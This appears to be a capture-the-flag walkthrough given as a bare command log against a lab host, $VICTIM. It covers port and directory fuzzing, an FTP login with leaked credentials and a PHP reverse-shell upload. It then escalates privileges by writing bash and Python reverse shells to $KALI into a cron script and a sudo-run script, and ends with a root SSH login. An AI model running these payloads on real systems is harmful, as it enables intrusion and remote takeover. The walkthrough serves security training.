nmap -sV -sT -O -p 1-65535 $VICTIM
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
ffuf -c -u http://$VICTIM/post.php?post=FUZZ -w SecLists/Discovery/Web-Content/SVNDigger/cat/Language/php.txt
cat results.txt | grep -v 2422
ffuf -c -u http://$VICTIM/post.php?post=FUZZ -w mylist.txt
cat results.txt | grep -v 2422
I remembered we had that secret file as well, I was able to read it and it had some credentials for FTP.
ftp $VICTIM
Username:ftpuser
Password: givemefiles777
git clone https://github.com/pentestmonkey/php-reverse-shell.git
cp php-reverse-shell/php-reverse-shell.php .
nc -lvnp 1234
put php-reverse-shell.php
python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg
cat /etc/crontab
cd /home/toby/jobs/
sudo -u toby rm -f cow.sh
sudo -u toby touch cow.sh
sudo -u toby chmod 777 cow.sh
echo '#!/bin/bash' > cow.sh
echo 'sh -i >& /dev/tcp/$KALI/1338 0>&1' >> cow.sh
python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg
cd /home/mat/scripts/
echo 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$KALI",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")' > cmd.py
sudo -u will /usr/bin/python3 /home/mat/scripts/will_script.py 1
python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg
chmod 600 id_rsa
ssh root@$VICTIM -i id_rsa
